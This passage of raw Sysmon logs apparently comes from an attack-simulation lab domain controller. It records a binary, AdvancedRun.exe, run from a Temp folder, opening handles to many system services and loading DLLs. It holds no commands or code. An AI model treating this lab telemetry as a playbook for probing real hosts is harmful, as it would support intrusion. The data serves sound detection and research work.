L+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075958Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.554{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075957Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075956Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075954Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075953Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.552{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.552{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075948Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.552{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.552{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.552{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
734700x80000000000000004075906Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.510{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.510{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.510{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075903Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.510{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 
(rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075902Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.509{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.509{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.509{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.509{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.508{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.508{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
